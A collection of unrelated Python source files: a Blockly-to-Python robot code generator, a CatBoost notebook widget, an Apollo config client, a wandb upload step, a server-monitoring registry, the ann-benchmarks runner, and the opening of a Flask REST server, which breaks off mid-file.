return '(1 + math.sqrt(5)) / 2'
elif field == 'SQRT2':
return 'math.sqrt(2)'
elif field == 'SQRT1_2':
return 'math.sqrt(0.5)'
elif field == 'INFINITY':
return 'math.inf'
elif block.attrib['type'] == 'math_modulo':
values = self.get_nodes('value', block)
if len(values) > 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
return '{} % {}'.format(val_a, val_b)
elif block.attrib['type'] == 'math_constrain':
values = self.get_nodes('value', block)
if len(values) > 2:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
val_c = self.__get_block_val(values[2], arg_map=arg_map)
return 'min(max({}, {}), {})'.format(val_a, val_b, val_c)
# elif block.attrib['type'] == 'math_round':
# pass
elif block.attrib['type'] == 'variables_get':
field = self.get_node('field', block).text
# return '(params[\'variables\'].get(\'{}\', 0) if \'{}\' in locals_keys or \'{}\' not in locals() else {})'.format(field, field, field, field)
if arg_map and field in arg_map:
return '{}'.format(arg_map[field])
else:
return 'params[\'variables\'].get(\'{}\', 0)'.format(field)
elif block.attrib['type'] == 'move_var':
val = self.get_node('field', block).text
return val
elif block.attrib['type'] == 'tool_get_date':
return 'datetime.datetime.now()'
elif block.attrib['type'] == 'tool_combination':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
var1 = self.__get_condition_expression(values[0], arg_map=arg_map)
var2 = self.__get_condition_expression(values[1], arg_map=arg_map)
return '\'{{}}{{}}{{}}\'.format({}, \'{}\', {})'.format(var1, field, var2)
elif block.attrib['type'] == 'procedures_callreturn':
mutation = self.get_node('mutation', block).attrib['name']
if not mutation:
mutation = '1'
if mutation in self._funcs:
name = self._funcs[mutation]
else:
name = 'function_{}'.format(self.func_index)
args = self.get_nodes('arg', root=self.get_node('mutation', block))
values = self.get_nodes('value', root=block)
if args and values and len(args) == len(values):
return 'MyDef.{}({})'.format(name, ','.join(
[self.__get_condition_expression(val, arg_map=arg_map) for val in values]))
else:
return 'MyDef.{}()'.format(name)
# return 'MyDef.{}()'.format(name)
def __get_block_val(self, block, arg_map=None):
block_v = self.get_node('block', root=block)
if block_v is not None:
val = self.__get_condition_expression(block, arg_map=arg_map)
else:
shadow = self.get_node('shadow', root=block)
val = self.get_node('field', root=shadow).text
return val
if __name__ == '__main__':
blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\\projects\\test\\xarm6\\app\\myapp\\local_test_1\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm6\\app\\myapp\\app_template\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm6\\app\\myapp\\test_gpio\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm7\\app\\myapp\\pour_water\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm7\\app\\myapp\\233\\app.xml')
import os
target_path = os.path.join(os.path.expanduser('~'), '.UFACTORY', 'app', 'tmp')
if not os.path.exists(target_path):
os.makedirs(target_path)
target_file = os.path.join(target_path, 'blockly_app.py')
blockly.to_python(target_file, arm='192.168.1.145')
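# A minimal sketch of the guard pattern the handlers above emit around each command in the
# generated script (illustrative only; the io/value arguments below are placeholders):
#
# if arm.error_code == 0 and not params['quit']:
#     code = arm.set_cgpio_digital(0, 1, delay_sec=0)
#     if code != 0:
#         params['quit'] = True
#         pprint('set_cgpio_digital, code={}'.format(code))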
|
ipythonwidget.py
|
import os
import csv
import time
from threading import Thread
from IPython.core.display import display, HTML
from traitlets import Unicode, Dict, default
from ipywidgets import DOMWidget, Layout, widget_serialization
class CatboostIpythonWidget(DOMWidget):
_view_name = Unicode('CatboostIpythonWidgetView').tag(sync=True)
_view_module = Unicode('catboost_module').tag(sync=True)
data = Dict({}).tag(sync=True, **widget_serialization)
def __init__(self, train_dir):
super(self.__class__, self).__init__()
self.train_dir = train_dir
@default('layout')
def _default_layout(self):
return Layout(height='500px', align_self='stretch')
def update_widget(self, subdirs=False):
# wait for training to start (meta.tsv to appear)
self.init_static()
time.sleep(1.0)
self.update_data(subdirs=subdirs)
display(self)
while self.needUpdate:
self.update_data(subdirs=subdirs)
time.sleep(2.0)
def run_update(self):
thread = Thread(target=self.update_widget, args=())
thread.start()
def get_subdirectories(self, a_dir):
return [{'name': name, 'path': os.path.join(a_dir, name)}
for name in os.listdir(a_dir) if os.path.isdir(os.path.join(a_dir, name))]
def update_data(self, subdirs=False):
data = {}
dirs = [{'name': 'current', 'path': self.train_dir}]
needUpdate = False
if subdirs:
dirs = self.get_subdirectories(self.train_dir)
for dir_info in dirs:
path = dir_info.get('path')
content = self.update_data_from_dir(path)
if not content:
continue
data[path] = {
'path': path,
'name': dir_info.get('name'),
'content': content
}
if not needUpdate:
needUpdate = data[path]['content']['passed_iterations'] < data[path]['content']['total_iterations']
self.data = data
self.needUpdate = needUpdate
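# Parses meta.tsv plus the learn/test/time_left logs under `path` and returns the passed and
# total iteration counts together with the raw rows, or None while meta.tsv / iterCount is
# not available yet.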
def update_data_from_dir(self, path):
data = {
'learn_error': [],
'test_error': [],
'time_left': '',
'meta': []
}
meta_tsv = os.path.join(path, 'meta.tsv')
if os.path.isfile(meta_tsv):
with open(meta_tsv, 'r') as meta_in:
data['meta'] = {}
for row in list(csv.reader(meta_in, delimiter='\t')):
if not len(row):
continue
if row[0] != 'loss':
data['meta'][row[0]] = row[1]
else:
data['meta'][row[0] + '_' + row[1]] = row[2]
logs = {
'test_error': data['meta']['testErrorLog'] if 'testErrorLog' in data['meta'] else 'test_error.tsv',
'learn_error': data['meta']['learnErrorLog'] if 'learnErrorLog' in data['meta'] else 'learn_error.tsv',
'time_left': data['meta']['timeLeft'] if 'timeLeft' in data['meta'] else 'time_left.tsv'
}
for error_type in logs:
file_path = os.path.join(path, logs[error_type])
if os.path.isfile(file_path):
with open(file_path, 'r') as f:
data[error_type] = list(csv.reader(f, delimiter='\t'))
passed_test_iterations = len(data['test_error']) - 1
passed_learn_iterations = len(data['learn_error']) - 1
passed_iterations = 0
if (passed_test_iterations > 0 and passed_learn_iterations > 0):
passed_iterations = min(passed_test_iterations, passed_learn_iterations)
elif passed_test_iterations > 0:
passed_iterations = passed_test_iterations
elif passed_learn_iterations > 0:
passed_iterations = passed_learn_iterations
if data['meta'] and data['meta']['iterCount']:
return {
'passed_iterations': passed_iterations,
'total_iterations': int(data['meta']['iterCount']),
'rows': data
}
else:
return None
@staticmethod
def get_static_path(file_name):
return os.path.join(os.path.dirname(__file__), file_name)
def init_static(self):
with open(self.get_static_path('CatboostIpython.css')) as f:
css = f.read()
js = ''
# never use require in your projects
js += 'window.__define = window.define;window.__require = window.require;window.define = undefined;window.require = undefined;'
with open(self.get_static_path('plotly-basic.min.js')) as f:
js += f.read()
js += 'window.define = window.__define;window.require = window.__require;window.__define = undefined; window.__require = undefined;'
with open(self.get_static_path('CatboostIpythonPlotly.js')) as f:
js += f.read()
with open(self.get_static_path('CatboostIpythonInit.js')) as f:
js += f.read()
html = """
<style>
{}
</style>
<script>
{}
</script>
""".format(css, js)
display(HTML(html))
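# A minimal usage sketch (the train_dir value is a placeholder, not part of
# this module): point the widget at a CatBoost training directory and start
# the background thread that keeps re-reading meta.tsv and the *_error.tsv logs.
#   widget = CatboostIpythonWidget('catboost_info')
#   widget.run_update()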
|
apollo_client.py
|
# -*- coding: utf-8 -*-
import json
import logging
import sys
import threading
import time
import requests
class ApolloClient(object):
def __init__(self, app_id, cluster='default', config_server_url='http://localhost:8080', timeout=35):
self.config_server_url = config_server_url
self.appId = app_id
self.cluster = cluster
self.timeout = timeout
self.stopped = False
self._stopping = False
self._cache = {}
self._notification_map = {'application': -1}
# Main method
def get_value(self, key, default_val=None, namespace='application', auto_fetch_on_cache_miss=False):
if namespace not in self._cache:
self._cache[namespace] = {}
logging.getLogger(__name__).info("Add namespace '%s' to local cache", namespace)
# This is a new namespace, need to do a blocking fetch to populate the local cache
if namespace not in self._notification_map:
self._notification_map[namespace] = -1
logging.getLogger(__name__).info("Add namespace '%s' to local notification map", namespace)
self._long_poll()
if key in self._cache[namespace]:
return self._cache[namespace][key]
else:
if auto_fetch_on_cache_miss:
return self._cached_http_get(key, default_val, namespace)
else:
return default_val
# Start the long polling loop. Two modes are provided:
# 1: thread mode (default), create a worker thread to do the loop. Call self.stop() to quit the loop
# 2: eventlet mode (recommended), no need to call the .stop() since it is async
def start(self, use_eventlet=False):
# First do a blocking long poll to populate the local cache, otherwise we may get racing problems
if len(self._cache) == 0:
self._long_poll()
if use_eventlet:
import eventlet
eventlet.spawn(self._listener)
else:
import signal
signal.signal(signal.SIGINT, self._signal_handler)
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGABRT, self._signal_handler)
t = threading.Thread(target=self._listener)
t.start()
def stop(self):
self._stopping = True
logging.getLogger(__name__).info("Stopping listener...")
def _cached_http_get(self, key, default_val, namespace='application'):
url = '{}/configfiles/json/{}/{}/{}'.format(self.config_server_url, self.appId, self.cluster, namespace)
r = requests.get(url)
if r.ok:
data = r.json()
self._cache[namespace] = data
logging.getLogger(__name__).info('Updated local cache for namespace %s', namespace)
else:
data = self._cache[namespace]
if key in data:
return data[key]
else:
return default_val
def _uncached_http_get(self, namespace='application'):
url = '{}/configs/{}/{}/{}'.format(self.config_server_url, self.appId, self.cluster, namespace)
r = requests.get(url)
if r.status_code == 200:
data = r.json()
self._cache[namespace] = data['configurations']
logging.getLogger(__name__).info('Updated local cache for namespace %s release key %s: %s',
namespace, data['releaseKey'],
repr(self._cache[namespace]))
def _signal_handler(self, signal, frame):
logging.getLogger(__name__).info('You pressed Ctrl+C!')
self._stopping = True
def _long_poll(self):
url = '{}/notifications/v2'.format(self.config_server_url)
notifications = []
for key in self._notification_map:
notification_id = self._notification_map[key]
notifications.append({
'namespaceName': key,
'notificationId': notification_id
})
r = requests.get(url=url, params={
'appId': self.appId,
'cluster': self.cluster,
'notifications': json.dumps(notifications, ensure_ascii=False)
}, timeout=self.timeout)
logging.getLogger(__name__).debug('Long polling returns %d: url=%s', r.status_code, r.request.url)
if r.status_code == 304:
# no change, loop
logging.getLogger(__name__).debug('No change, loop...')
return
if r.status_code == 200:
data = r.json()
for entry in data:
ns = entry['namespaceName']
nid = entry['notificationId']
logging.getLogger(__name__).info("%s has changes: notificationId=%d", ns, nid)
self._uncached_http_get(ns)
self._notification_map[ns] = nid
else:
            logging.getLogger(__name__).warning('Unexpected status code %d from long polling, sleeping...', r.status_code)
time.sleep(self.timeout)
def _listener(self):
logging.getLogger(__name__).info('Entering listener loop...')
while not self._stopping:
self._long_poll()
logging.getLogger(__name__).info("Listener stopped!")
self.stopped = True
if __name__ == '__main__':
root = logging.getLogger()
root.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
root.addHandler(ch)
client = ApolloClient('pycrawler')
client.start()
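    # A hedged example of reading a value once polling has started
    # ('some_key' is a placeholder key, not part of the original demo):
    # print(client.get_value('some_key', default_val='fallback'))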
if sys.version_info[0] < 3:
v = raw_input('Press any key to quit...')
else:
v = input('Press any key to quit...')
client.stop()
while not client.stopped:
pass
|
step_checksum.py
|
"""Batching file prepare requests to our API."""
import collections
import os
import shutil
import threading
import wandb.util
from wandb.filesync import step_upload
RequestUpload = collections.namedtuple(
"RequestUpload",
(
"path",
"save_name",
"artifact_id",
"copy",
"use_prepare_flow",
"save_fn",
"digest",
),
)
RequestStoreManifestFiles = collections.namedtuple(
"RequestStoreManifestFiles", ("manifest", "artifact_id", "save_fn")
)
RequestCommitArtifact = collections.namedtuple(
"RequestCommitArtifact", ("artifact_id", "finalize", "before_commit", "on_commit")
)
RequestFinish = collections.namedtuple("RequestFinish", ("callback"))
class StepChecksum(object):
def __init__(self, api, tempdir, request_queue, output_queue, stats):
self._api = api
self._tempdir = tempdir
self._request_queue = request_queue
self._output_queue = output_queue
self._stats = stats
self._thread = threading.Thread(target=self._thread_body)
self._thread.daemon = True
def _thread_body(self):
finished = False
while True:
req = self._request_queue.get()
if isinstance(req, RequestUpload):
path = req.path
if req.copy:
path = os.path.join(
self._tempdir.name,
"%s-%s" % (wandb.util.generate_id(), req.save_name),
)
wandb.util.mkdir_exists_ok(os.path.dirname(path))
try:
# certain linux distros throw an exception when copying
# large files: https://bugs.python.org/issue43743
shutil.copy2(req.path, path)
except OSError:
shutil._USE_CP_SENDFILE = False
shutil.copy2(req.path, path)
checksum = None
if req.use_prepare_flow:
# passing a checksum through indicates that we'd like to use the
# "prepare" file upload flow, in which we prepare the files in
# the database before uploading them. This is currently only
# used for artifact manifests
checksum = wandb.util.md5_file(path)
self._stats.init_file(req.save_name, os.path.getsize(path))
self._output_queue.put(
step_upload.RequestUpload(
path,
req.save_name,
req.artifact_id,
checksum,
req.copy,
req.save_fn,
req.digest,
)
)
elif isinstance(req, RequestStoreManifestFiles):
for entry in req.manifest.entries.values():
if entry.local_path:
# This stupid thing is needed so the closure works correctly.
def make_save_fn_with_entry(save_fn, entry):
return lambda progress_callback: save_fn(
entry, progress_callback
)
self._stats.init_file(
entry.local_path, entry.size, is_artifact_file=True
)
self._output_queue.put(
step_upload.RequestUpload(
entry.local_path,
entry.path,
req.artifact_id,
entry.digest,
False,
make_save_fn_with_entry(req.save_fn, entry),
entry.digest,
)
)
elif isinstance(req, RequestCommitArtifact):
self._output_queue.put(
step_upload.RequestCommitArtifact(
req.artifact_id, req.finalize, req.before_commit, req.on_commit
)
)
elif isinstance(req, RequestFinish):
break
else:
raise Exception("internal error")
self._output_queue.put(step_upload.RequestFinish(req.callback))
def start(self):
self._thread.start()
def is_alive(self):
return self._thread.is_alive()
def finish(self):
self._request_queue.put(RequestFinish(None))
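# A hedged wiring sketch (api, tempdir and stats are assumed to be provided by
# the caller and are not constructed here): callers push the namedtuples
# defined above onto the request queue, and StepChecksum forwards matching
# step_upload requests to the output queue.
#   request_q, output_q = queue.Queue(), queue.Queue()
#   step = StepChecksum(api, tempdir, request_q, output_q, stats)
#   step.start()
#   request_q.put(RequestUpload(path, save_name, artifact_id, copy=True,
#                               use_prepare_flow=False, save_fn=None, digest=None))
#   step.finish()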
|
process.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: leeyoshinari
import time
import json
import threading
import influxdb
from logger import logger, cfg, handle_exception
from request import Request
class Process(object):
def __init__(self):
self.request = Request()
self._slaves = {'ip': [], 'port': [], 'system': [], 'cpu': [], 'mem': [], 'time': [], 'disk': [], 'nic': [],
'network_speed': [], 'disk_size': [], 'mem_usage': [], 'cpu_usage': [], 'disk_usage': []}
        # Set the data retention (expiry) policy on the InfluxDB database
conn = influxdb.InfluxDBClient(cfg.getInflux('host'), cfg.getInflux('port'), cfg.getInflux('username'),
cfg.getInflux('password'), cfg.getInflux('database'))
conn.query(f'alter retention policy "autogen" on "{cfg.getInflux("database")}" duration '
f'{cfg.getInflux("expiryTime")}d REPLICATION 1 SHARD DURATION {cfg.getInflux("shardDuration")} default;')
        logger.info(f'Data expiry time set to {cfg.getInflux("expiryTime")} days.')
        t = threading.Thread(target=self.check_status, args=())  # Start a thread that checks whether registered clients are still online
t.start()
@property
def slaves(self):
return self._slaves
@slaves.setter
def slaves(self, value):
        logger.debug(f'Client registration payload: {value}')
ip = value['host']
if ip in self._slaves['ip']:
ind = self._slaves['ip'].index(ip)
self._slaves['cpu_usage'][ind] = value['cpu_usage']
self._slaves['mem_usage'][ind] = value['mem_usage']
self._slaves['disk_usage'][ind] = value['disk_usage']
self._slaves['time'][ind] = time.time()
            logger.info(f'Server {ip} already registered; heartbeat data updated')
else:
self._slaves['ip'].append(value['host'])
self._slaves['port'].append(value['port'])
self._slaves['system'].append(value['system'])
self._slaves['cpu'].append(value['cpu'])
self._slaves['mem'].append(value['mem'])
self._slaves['time'].append(time.time())
self._slaves['disk'].append(value['disks'].split(','))
self._slaves['nic'].append(value['nic'])
self._slaves['disk_size'].append(value['disk_size'])
self._slaves['network_speed'].append(value['network_speed'])
self._slaves['cpu_usage'].append((value['cpu_usage']))
self._slaves['mem_usage'].append((value['mem_usage']))
self._slaves['disk_usage'].append((value['disk_usage']))
            logger.info(f'Server {ip} registered successfully')
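    # A hedged example of the registration payload this setter expects
    # (all values below are illustrative, not taken from a real agent):
    #   {'host': '192.168.1.10', 'port': '12121', 'system': 'linux',
    #    'cpu': 8, 'mem': 16, 'disks': 'sda,sdb', 'nic': 'eth0',
    #    'disk_size': '500G', 'network_speed': 1000,
    #    'cpu_usage': 0.12, 'mem_usage': 0.35, 'disk_usage': 0.40}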
def check_status(self):
"""
        Check whether registered clients are still online; remove any that are not.
:return:
"""
while True:
time.sleep(5)
for i in range(len(self._slaves['ip'])):
if time.time() - self._slaves['time'][i] > 8:
ip = self._slaves['ip'].pop(i)
self._slaves['port'].pop(i)
self._slaves['system'].pop(i)
self._slaves['cpu'].pop(i)
self._slaves['mem'].pop(i)
self._slaves['time'].pop(i)
self._slaves['disk'].pop(i)
self._slaves['nic'].pop(i)
self._slaves['network_speed'].pop(i)
self._slaves['disk_size'].pop(i)
self._slaves['cpu_usage'].pop(i)
self._slaves['mem_usage'].pop(i)
self._slaves['disk_usage'].pop(i)
                    logger.warning(f"Client server {ip} is in an abnormal state and has been taken offline")
break
@handle_exception(is_return=True, default_value=[-1, -1, -1, -1, '-', -1])
def get_gc(self, ip, port, interface):
"""
        Fetch garbage-collection data for a port, by requesting http://ip:port/interface
        :param ip: client server IP
        :param port: port the client agent listens on
        :param interface: name of the interface (endpoint) to call
:return:
"""
res = self.request.request('get', ip, port, interface)
if res.status_code == 200:
response = json.loads(res.content.decode())
            logger.debug(f'GC data for port {port} on server {ip}: {response}')
if response['code'] == 0:
return response['data']
else:
logger.error(response['msg'])
return [-1, -1, -1, -1, '-', -1]
else:
            logger.error(f'GC data request for port {port} on server {ip} returned status code {res.status_code}')
return [-1, -1, -1, -1, '-', -1]
@handle_exception(is_return=True, default_value={'host': [], 'port': [], 'pid': [], 'isRun': [], 'startTime': []})
def get_monitor(self, host=None):
"""
        Fetch the list of monitored ports.
:return:
"""
monitor_list = {'host': [], 'port': [], 'pid': [], 'isRun': [], 'startTime': []}
if host:
post_data = {
'host': host,
}
port = self._slaves['port'][self._slaves['ip'].index(host)]
            res = self.request.request('post', host, port, 'getMonitor', json=post_data)  # fetch via HTTP
if res.status_code == 200:
response = json.loads(res.content.decode())
                logger.debug(f'Monitor list returned by server {host}: {response}')
if response['code'] == 0:
                    # Merge the port monitor lists
monitor_list['host'] += response['data']['host']
monitor_list['port'] += response['data']['port']
monitor_list['pid'] += response['data']['pid']
monitor_list['isRun'] += response['data']['isRun']
monitor_list['startTime'] += response['data']['startTime']
else:
            for ip, port in zip(self._slaves['ip'], self._slaves['port']):  # Iterate over all client IPs and fetch each port monitor list
post_data = {
'host': ip,
}
                res = self.request.request('post', ip, port, 'getMonitor', json=post_data)  # fetch via HTTP
if res.status_code == 200:
response = json.loads(res.content.decode())
                    logger.debug(f'Monitor list returned by server {ip}: {response}')
if response['code'] == 0:
                        # Merge the port monitor lists
monitor_list['host'] += response['data']['host']
monitor_list['port'] += response['data']['port']
monitor_list['pid'] += response['data']['pid']
monitor_list['isRun'] += response['data']['isRun']
monitor_list['startTime'] += response['data']['startTime']
return monitor_list
|
main.py
|
from __future__ import absolute_import
import argparse
import logging
import logging.config
import docker
import multiprocessing.pool
import os
import psutil
import random
import shutil
import sys
import traceback
from ann_benchmarks.datasets import get_dataset, DATASETS
from ann_benchmarks.constants import INDEX_DIR
from ann_benchmarks.algorithms.definitions import (get_definitions,
list_algorithms,
algorithm_status,
InstantiationStatus)
from ann_benchmarks.results import get_result_filename
from ann_benchmarks.runner import run, run_docker
def positive_int(s):
i = None
try:
i = int(s)
except ValueError:
pass
if not i or i < 1:
raise argparse.ArgumentTypeError("%r is not a positive integer" % s)
return i
def run_worker(cpu, args, queue):
while not queue.empty():
definition = queue.get()
if args.local:
run(definition, args.dataset, args.count, args.runs, args.batch)
else:
memory_margin = 500e6 # reserve some extra memory for misc stuff
mem_limit = int((psutil.virtual_memory().available - memory_margin) / args.parallelism)
cpu_limit = str(cpu)
if args.batch:
cpu_limit = "0-%d" % (multiprocessing.cpu_count() - 1)
print("\t\tRunning %s with build=%s and query=%s | %d experiments left" % (definition.algorithm, definition.arguments, definition.query_argument_groups, queue.qsize()))
run_docker(definition, args.dataset, args.count,
args.runs, args.timeout, args.batch, cpu_limit, mem_limit)
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--dataset',
metavar='NAME',
help='the dataset to load training points from',
default='glove-100-angular',
choices=DATASETS.keys())
parser.add_argument(
"-k", "--count",
default=10,
type=positive_int,
help="the number of near neighbours to search for")
parser.add_argument(
'--definitions',
metavar='FILE',
help='load algorithm definitions from FILE',
default='algos.yaml')
parser.add_argument(
'--algorithm',
metavar='NAME',
help='run only the named algorithm',
default=None)
parser.add_argument(
'--docker-tag',
metavar='NAME',
help='run only algorithms in a particular docker image',
default=None)
parser.add_argument(
'--list-algorithms',
help='print the names of all known algorithms and exit',
action='store_true')
parser.add_argument(
'--force',
help='re-run algorithms even if their results already exist',
action='store_true')
parser.add_argument(
'--runs',
metavar='COUNT',
type=positive_int,
help='run each algorithm instance %(metavar)s times and use only'
' the best result',
default=5)
parser.add_argument(
'--pin',
metavar='cpu',
type=positive_int,
help='pin process to given cpu',
default=1)
parser.add_argument(
'--timeout',
type=int,
        help='Timeout (in seconds) for each individual algorithm run, or -1 '
'if no timeout should be set',
default=12 * 3600)
parser.add_argument(
'--local',
action='store_true',
help='If set, then will run everything locally (inside the same '
'process) rather than using Docker')
parser.add_argument(
'--batch',
action='store_true',
help='If set, algorithms get all queries at once')
parser.add_argument(
'--max-n-algorithms',
type=int,
help='Max number of algorithms to run (just used for testing)',
default=-1)
parser.add_argument(
'--run-disabled',
help='run algorithms that are disabled in algos.yml',
action='store_true')
parser.add_argument(
'--parallelism',
type=positive_int,
help='Number of Docker containers in parallel',
default=1)
args = parser.parse_args()
if args.timeout == -1:
args.timeout = None
if args.list_algorithms:
list_algorithms(args.definitions)
sys.exit(0)
logging.config.fileConfig("logging.conf")
logger = logging.getLogger("annb")
# Nmslib specific code
# Remove old indices stored on disk
if os.path.exists(INDEX_DIR):
shutil.rmtree(INDEX_DIR)
dataset = get_dataset(args.dataset)
dimension = len(dataset['train'][0]) # TODO(erikbern): ugly
point_type = dataset.attrs.get('point_type', 'float')
distance = dataset.attrs['distance']
definitions = get_definitions(
args.definitions, dimension, point_type, distance, args.count)
# Filter out, from the loaded definitions, all those query argument groups
# that correspond to experiments that have already been run. (This might
# mean removing a definition altogether, so we can't just use a list
# comprehension.)
filtered_definitions = []
for definition in definitions:
query_argument_groups = definition.query_argument_groups
if not query_argument_groups:
query_argument_groups = [[]]
not_yet_run = []
for query_arguments in query_argument_groups:
fn = get_result_filename(args.dataset,
args.count, definition,
query_arguments, args.batch)
if args.force or not os.path.exists(fn):
not_yet_run.append(query_arguments)
if not_yet_run:
if definition.query_argument_groups:
definition = definition._replace(
query_argument_groups=not_yet_run)
filtered_definitions.append(definition)
definitions = filtered_definitions
random.shuffle(definitions)
if args.algorithm:
logger.info(f'running only {args.algorithm}')
definitions = [d for d in definitions if d.algorithm == args.algorithm]
if not args.local:
# See which Docker images we have available
docker_client = docker.from_env()
docker_tags = set()
for image in docker_client.images.list():
for tag in image.tags:
tag = tag.split(':')[0]
docker_tags.add(tag)
if args.docker_tag:
logger.info(f'running only {args.docker_tag}')
definitions = [
d for d in definitions if d.docker_tag == args.docker_tag]
if set(d.docker_tag for d in definitions).difference(docker_tags):
logger.info(f'not all docker images available, only: {set(docker_tags)}')
logger.info(f'missing docker images: '
f'{str(set(d.docker_tag for d in definitions).difference(docker_tags))}')
definitions = [
d for d in definitions if d.docker_tag in docker_tags]
else:
def _test(df):
status = algorithm_status(df)
# If the module was loaded but doesn't actually have a constructor
# of the right name, then the definition is broken
if status == InstantiationStatus.NO_CONSTRUCTOR:
raise Exception("%s.%s(%s): error: the module '%s' does not"
" expose the named constructor" % (
df.module, df.constructor,
df.arguments, df.module))
if status == InstantiationStatus.NO_MODULE:
# If the module couldn't be loaded (presumably because
# of a missing dependency), print a warning and remove
# this definition from the list of things to be run
logging.warning("%s.%s(%s): the module '%s' could not be "
"loaded; skipping" % (df.module, df.constructor,
df.arguments, df.module))
return False
else:
return True
definitions = [d for d in definitions if _test(d)]
if not args.run_disabled:
if len([d for d in definitions if d.disabled]):
logger.info(f'Not running disabled algorithms {[d for d in definitions if d.disabled]}')
definitions = [d for d in definitions if not d.disabled]
if args.max_n_algorithms >= 0:
definitions = definitions[:args.max_n_algorithms]
if len(definitions) == 0:
raise Exception('Nothing to run')
else:
logger.info(f'Order: {definitions}')
print("\tRunning %d experiments on %s (k=%d)" % (len(definitions), args.dataset, args.count))
if args.parallelism > multiprocessing.cpu_count() - 1:
raise Exception('Parallelism larger than %d! (CPU count minus one)' % (multiprocessing.cpu_count() - 1))
if args.parallelism > 1 and args.pin != 1:
        raise Exception('Cannot pin to single CPU if parallelism is set')
queue = multiprocessing.Queue()
for definition in definitions:
queue.put(definition)
if args.batch and args.parallelism > 1:
raise Exception(f"Batch mode uses all available CPU resources, --parallelism should be set to 1. (Was: {args.parallelism})")
start_cpu = args.pin
workers = [multiprocessing.Process(target=run_worker, args=(i + args.pin, args, queue))
for i in range(args.parallelism)]
[worker.start() for worker in workers]
[worker.join() for worker in workers]
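# A hedged invocation sketch (the runner-script name is an assumption; the
# flags are the ones declared above). main() drops experiments whose result
# files already exist, shuffles the remaining definitions, and fans them out
# to --parallelism worker processes pinned from --pin upward:
#   python run.py --dataset glove-100-angular --algorithm annoy --parallelism 2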
|
EmRestServer.py
|
#! /usr/bin/env python
# _*_ coding: utf-8 _*_
# Copyright(c) 2019 Nippon Telegraph and Telephone Corporation
# Filename: EmRestServer.py
'''
Rest Server function.
'''
import os
import imp
import traceback
import threading
import functools
import signal
from datetime import datetime, timedelta
from copy import deepcopy
from flask import Flask, request
from flask_cors import CORS
import GlobalModule
from EmCommonLog import decorater_log
from EmCommonLog import decorater_log_in_out
application = Flask(__name__)
CORS(application)
_request_date_list = []
_request_lock = threading.Lock()
@decorater_log_in_out
def get_counter_recv():
_request_lock.acquire()
is_ok, unit_time = (
GlobalModule.EM_CONFIG.read_sys_common_conf("Rest_request_average"))
diffdate = datetime.now() - timedelta(seconds=unit_time)
counter = 0
for timeval in _request_date_list[:]:
counter += 1
if timeval <= diffdate:
break
_request_lock.release()
return counter
def _deco_count_request(func):
'''
Request counter recorder.
'''
@functools.wraps(func)
def wrapper(*args, **kwargs):
_request_counter()
return func(*args, **kwargs)
return wrapper
@decorater_log
def _request_counter(request_date=None):
    '''
    Update request history list.
    '''
    if request_date is None:
        # Evaluate "now" at call time; a datetime.now() default would be frozen
        # at import time and every request would share the same timestamp.
        request_date = datetime.now()
_request_lock.acquire()
is_ok, unit_time = (
GlobalModule.EM_CONFIG.read_sys_common_conf("Rest_request_average"))
if not is_ok:
GlobalModule.EM_LOGGER.error('310009 REST Count Error')
_request_lock.release()
return False
before_time = request_date + timedelta(seconds=(-1 * unit_time))
global _request_date_list
_request_date_list.append(request_date)
_request_date_list = [
tmp for tmp in deepcopy(_request_date_list) if tmp >= before_time]
_request_lock.release()
return True
@application.route("/v1/internal/em_ctrl/statusget")
@_deco_count_request
def rest_if_statusget():
'''
Controller status acquisition.
Obtain controller status.
Parameter:
key : Key
Return value :
'''
return _execute_rest_api("/v1/internal/em_ctrl/statusget",
request=request,
request_date_list=deepcopy(_request_date_list))
@application.route("/v1/internal/em_ctrl/log")
@_deco_count_request
def rest_if_logget():
'''
Controller log acquisition.
Obtain controller log.
Parameter:
key : Key
Return value :
'''
return _execute_rest_api("/v1/internal/em_ctrl/log",
request=request)
@application.route("/v1/internal/em_ctrl/ctrl-switch", methods=["POST"])
@_deco_count_request
def rest_if_ctrlswitch():
'''
    Switches over the controller.
    Executes controller switch-over.
Parameter:
key : Key
Return value :
'''
return _execute_rest_api("/v1/internal/em_ctrl/ctrl-switch",
request=request)
@application.route("/v1/internal/node_ctrl/<hostname>/neconfigaudit")
@_deco_count_request
def rest_if_device_config_audit(hostname):
'''
Device Config-Audit.
Executes device Config-Audit.
Parameter:
key : Key
Return value :
'''
return _execute_rest_api("/v1/internal/node_ctrl/<hostname>/neconfigaudit",
request=request,
hostname=hostname)
@decorater_log
def _execute_rest_api(rest_uri, *args, **kwargs):
'''
Conduct processing which is common for REST server.
'''
GlobalModule.EM_LOGGER.info(
'110004 Request Received: %s', rest_uri)
try:
scenario_name = _select_rest_scenario(rest_uri)
scenario_ins = _import_scenario_and_get_instance(scenario_name)
response = _execute_scenario(scenario_ins, *args, **kwargs)
except Exception as ex:
raise
return response
@decorater_log
def _select_rest_scenario(rest_uri):
'''
    Determine which REST scenario to launch.
'''
is_result, rest_scnario = (
GlobalModule.EM_CONFIG.read_scenario_rest_conf(rest_uri))
if not is_result:
GlobalModule.EM_LOGGER.debug(
"REST API cannot get this scenario : %s" % (rest_uri,))
raise KeyError(
"ERROR! REST API unknown scenario : %s" % (rest_uri,))
else:
scenario_name_em = 'Em' + rest_scnario
GlobalModule.EM_LOGGER.debug(
"get scenario result Scenario:%s" % (scenario_name_em,))
return scenario_name_em
@decorater_log
def _import_scenario_and_get_instance(rest_scenario_name):
'''
Read scenario, obtain instance applicable to the class.
'''
